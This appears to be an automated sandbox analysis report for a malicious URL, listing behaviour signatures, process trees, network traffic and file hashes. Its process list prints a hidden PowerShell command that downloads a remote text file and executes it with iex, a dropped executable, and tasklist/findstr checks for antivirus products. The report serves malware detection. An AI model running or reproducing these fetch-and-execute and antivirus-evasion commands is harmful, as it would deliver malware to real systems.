Analysis Overview
Threat Level: Known bad
The file http://kodekthungg.com/go/6818d61d-1f2e-4bc0-a98b-c63669acc41f was found to be: Known bad.
Malicious Activity Summary
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Enumerates processes with tasklist
Drops file in System32 directory
Browser Information Discovery
Suspicious use of FindShellTrayWindow
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Enumerates system info in registry
Suspicious use of AdjustPrivilegeToken
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-13 12:30
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-13 12:30
Reported
2024-11-13 12:31
Platform
win10v2004-20241007-en
Max time kernel
48s
Max time network
49s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe | N/A |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | C:\Windows\System32\WindowsPowerShell\v1.0\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Browser Information Discovery
Enumerates system info in registry
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe | N/A |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe | N/A |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument http://kodekthungg.com/go/6818d61d-1f2e-4bc0-a98b-c63669acc41f
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffc8e1646f8,0x7ffc8e164708,0x7ffc8e164718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1432,2465979859533611079,424517980741900603,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1432,2465979859533611079,424517980741900603,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1432,2465979859533611079,424517980741900603,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2716 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1432,2465979859533611079,424517980741900603,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3264 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1432,2465979859533611079,424517980741900603,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1432,2465979859533611079,424517980741900603,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5036 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1432,2465979859533611079,424517980741900603,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3920 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1432,2465979859533611079,424517980741900603,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3920 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1432,2465979859533611079,424517980741900603,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5216 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1432,2465979859533611079,424517980741900603,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5268 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1432,2465979859533611079,424517980741900603,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5740 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1432,2465979859533611079,424517980741900603,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5524 /prefetch:1
C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -command $uR='https://fixedzip.oss-ap-southeast-5.aliyuncs.com/pioneer.txt'; $reS=Invoke-WebRequest -Uri $uR -UseBasicParsing; $t=$reS.Content; iex $t
C:\Users\Admin\AppData\Roaming\Extracted\MeasurementsPioneer.exe
"C:\Users\Admin\AppData\Roaming\Extracted\MeasurementsPioneer.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy Variable Variable.cmd & Variable.cmd
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa opssvc"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
C:\Windows\SysWOW64\cmd.exe
cmd /c md 378953
C:\Windows\SysWOW64\findstr.exe
findstr /V "dideditionindividualdig" Dans
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | kodekthungg.com | udp |
| US | 52.55.41.13:80 | kodekthungg.com | tcp |
| US | 52.55.41.13:80 | kodekthungg.com | tcp |
| US | 8.8.8.8:53 | sos-at-vie-2.exo.io | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.41.55.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| AT | 138.124.210.238:443 | sos-at-vie-2.exo.io | tcp |
| US | 8.8.8.8:53 | www.cloudflare.com | udp |
| US | 104.16.123.96:443 | www.cloudflare.com | tcp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.210.124.138.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.38.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 96.123.16.104.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fixedzip.oss-ap-southeast-5.aliyuncs.com | udp |
| ID | 149.129.200.56:443 | fixedzip.oss-ap-southeast-5.aliyuncs.com | tcp |
| US | 8.8.8.8:53 | 56.200.129.149.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | f426165d1e5f7df1b7a3758c306cd4ae |
| SHA1 | 59ef728fbbb5c4197600f61daec48556fec651c1 |
| SHA256 | b68dfc21866d0abe5c75d70acc54670421fa9b26baf98af852768676a901b841 |
| SHA512 | 8d437fcb85acb0705bf080141e7a021740901248985a76299ea8c43e46ad78fb88c738322cf302f6a550caa5e79d85b36827e9b329b1094521b17cf638c015b6 |
\??\pipe\LOCAL\crashpad_5024_OGTPNQYFZQZLSGDN
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 6960857d16aadfa79d36df8ebbf0e423 |
| SHA1 | e1db43bd478274366621a8c6497e270d46c6ed4f |
| SHA256 | f40b812ce44e391423eb66602ac0af138a1e948aa8c4116045fef671ef21cd32 |
| SHA512 | 6deb2a63055a643759dd0ae125fb2f68ec04a443dbf8b066a812b42352bbcfa4517382ed0910c190c986a864559c3453c772e153ee2e9432fb2de2e1e49ca7fe |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | ff8d025a6296e4a341964a4d4405043c |
| SHA1 | 037b37f7b630171bfa0ee205dd452f2adfb68f9b |
| SHA256 | d60d2f0467be79f4111d21759c37fd583b37e98973e2f42c45d4744dd3d689df |
| SHA512 | 5d068eb471bd7aa5f49dbd09d5bd77ba83b9d157002b981e98fc2d538f5eb8e2ffc7c13ca1bea7349db626e626bb2f16cfeaed78ce7cc2bdd4fea77c5d0d86a3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 206702161f94c5cd39fadd03f4014d98 |
| SHA1 | bd8bfc144fb5326d21bd1531523d9fb50e1b600a |
| SHA256 | 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167 |
| SHA512 | 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | ccea8542de9f574cae33610081b0ea23 |
| SHA1 | 48e2dc64b480d3288b94bf26227e9d4d195552ef |
| SHA256 | 02c35af4464aa0e7a20018dd9064d49289933a5b43555c15b3bd73ed31e61bf7 |
| SHA512 | a8cac96d74cf3b89e949b3f90fa4108b77e2d5ead9376ac2fdb577c528e1c5b2ef4c735fff9fed332db6e9ab61f520c89c14028f7e173d7aa9e709b2388b4c9d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | b71c2d04aeb5c046520ae070e766d354 |
| SHA1 | 32a5f5f8ddf5c118854139893c2026e22b2f2094 |
| SHA256 | 22c2fe4302bd466575e774fabd9eafac7f489b78b98fd4cd7f89ec16e716c182 |
| SHA512 | 8383e9af5ea5d4979a72b8867c0c7d032618df48b53f28326238a44845995086e9f88a0a3201de5cf34781e8b65005034dbec80db948410896dc2a94e0df8cfa |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\0b9c9b35-4a02-461b-9443-137e0afcdc59.tmp
| MD5 | e04d66387279a1e0e66a58c3ba8b5d10 |
| SHA1 | 67bab272b21834da5ae795ef2ada7e10fe6afe75 |
| SHA256 | 2808fcf390832bf0b49792f08ee025e4027f2636a06603f4b28b7bc064320e92 |
| SHA512 | 2a6fd4c7399f26b01d973eb5382728201786f07d0eed88c1b2bd6161f4e52c67490ef0dc10e9b7ded1b9225b40e8a940a686e2247600e1547ec11157169e3118 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_r00jm5cx.t0q.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/5560-99-0x0000019945470000-0x0000019945492000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 24e67878b4334507219370c4aec2b0ce |
| SHA1 | 25e31676c99b0e9b7e3f7335f992ba8659642e87 |
| SHA256 | 049906f6d6d06c3e5fdcec75010b070fa1351a5b1130e37556b00ce17873a514 |
| SHA512 | 62b55f2007e272587f7a8dc0b9a66448d2d45e1549793faeb43561d632abf033f95c5aa8e1ea7cdbb352c194a3e47e02a2bf669a86106395ae244bb859a2f837 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 01be0162652675902199abe17c8e7ae6 |
| SHA1 | 8a4c86b84b8277d8f28b5db1837a8e68d42fe219 |
| SHA256 | 8b4bcec8a224834bb086e3c0a6b6866f64b78e24018704a97e9317daedd4e5cd |
| SHA512 | c6f81c20598e36102c86fb777ce0241c3aea4093ea954a14b6f8810ce4487dbe3209459d0f7aed758c33036514c9372191bbd2761a472c1b2577c6df1fee439f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | af56eaf62c3fa2f38c48a4ff331238a2 |
| SHA1 | 6bc5f811a4a8455f031ec1c0ba03d7b8a7c9a1e8 |
| SHA256 | 06161077f4da08fd4b41d38ded85d095616a108c748b7eed63a68c59279c0824 |
| SHA512 | fd52d97a00a100547924f6de946fc7f56a72f9a19feca2f0d0f40a4f5fada78f784e962b5dc587d07853293aa12bbe407b11abc418bb40b75a945c79d3b39230 |
memory/5560-207-0x00000199458F0000-0x00000199458FA000-memory.dmp
memory/5560-208-0x0000019945920000-0x0000019945932000-memory.dmp
C:\Users\Admin\AppData\Roaming\Extracted\MeasurementsPioneer.exe
| MD5 | e436b3a4f1a7321e8068f29bcf3940b1 |
| SHA1 | 071c1b9a732521f246645d95ad2912a19bf72224 |
| SHA256 | 09be857a377546f71794ac070a47f8441fd63160c641d1d072c11d57afc32ef0 |
| SHA512 | 41cad870441ccce5da604aa337954fa5c306d35e7a4265819bd3e94d7cb1b451e4560a5f1f3c0b1293723067a7d56b25dfef6852f96409db070df0dd4f5e359f |
C:\Users\Admin\AppData\Roaming\Extracted\MeasurementsPioneer.exe
| MD5 | 75c9f8b6ff52c1ee6e6d65f77d2c96b6 |
| SHA1 | 5da7a0ed33c144c4e6243758c4811d95c1f6ee48 |
| SHA256 | 4acf78656020852979cd57863dc7292d4978cf3d3cf70f08b216ae6a35ab822f |
| SHA512 | 2562f206aa586fb43f87366ad8232bb8490efb64d64571bcb46a6c55e87f513577c81010fada8c23d1cb9920bc432a1ab384b78c1a56808ba7579cfef06e8c86 |
C:\Users\Admin\AppData\Roaming\Extracted\MeasurementsPioneer.exe
| MD5 | 57ad22fbace6bdc2b91b4749fee45b1f |
| SHA1 | 1ac182112936fbe3cf7a2c67a6f47cf398088604 |
| SHA256 | 1a97d955f5cf9baab0ffd6d4411cef225758a1ead0ab9590cbc928f5f854942a |
| SHA512 | f69fb32c69d5cdafe555866756379990dada28fa01ef5a095d4e8aa2e9fbb38e51c6b46510a0f2f67220193b0212b985c4219029d98e9bd87d3f96dc59ee192e |
C:\Users\Admin\AppData\Local\Temp\Variable
| MD5 | d55f01f0fb018b9ba38cff9f3bd761e2 |
| SHA1 | 06b62c4ee269fc6d3270b12c66a0b24100255044 |
| SHA256 | ba0f96a1e3c5068d09e581768aa0079db3f087d6560d260e52df655b2b583f78 |
| SHA512 | bc2d30c82b882bfe54ff6662458a062af24f5e7a66281aaff679a3ff61f7a689697960946185addb0c1063c2fc11ba4b5385c5f8530ebc5bf7b66008b6d7b4dd |
C:\Users\Admin\AppData\Local\Temp\Dans
| MD5 | 904400b251be89b48ce61493053ff19c |
| SHA1 | 1075d4efa4cdd9be308a8ff2c5b3f7a33ccd6f17 |
| SHA256 | e2c9bed074ed6a4603d322c96406f0fa3094e8797be9238fffbfa4ae3fc24b01 |
| SHA512 | 1765d1a12b532eb2842804803edca08e934016e1e39286c011876a640e56cf893a751f7cca4edd846aab5be06dfe3c9eecf39b8fdecf03bdf16ef50635124681 |
C:\Users\Admin\AppData\Local\Temp\Fighting
| MD5 | 80f09bf6206864e0aa01f873f01500fb |
| SHA1 | 69f399b9a23d7c52ebaf121688594e4e310d13f0 |
| SHA256 | 695708ccf96c149faceb5566d9f07f3bd5e3477c1fd3e3f381654f8f527ad1ce |
| SHA512 | e7e74905c3ff4669e74cd05d4173cabab1916158ba34d2c4d2660f3156716b7c1973cebff9b3efae3fe1c9700e5cd5e51dd1f6fdf3f4a5b0470d5fd2d2aad2cf |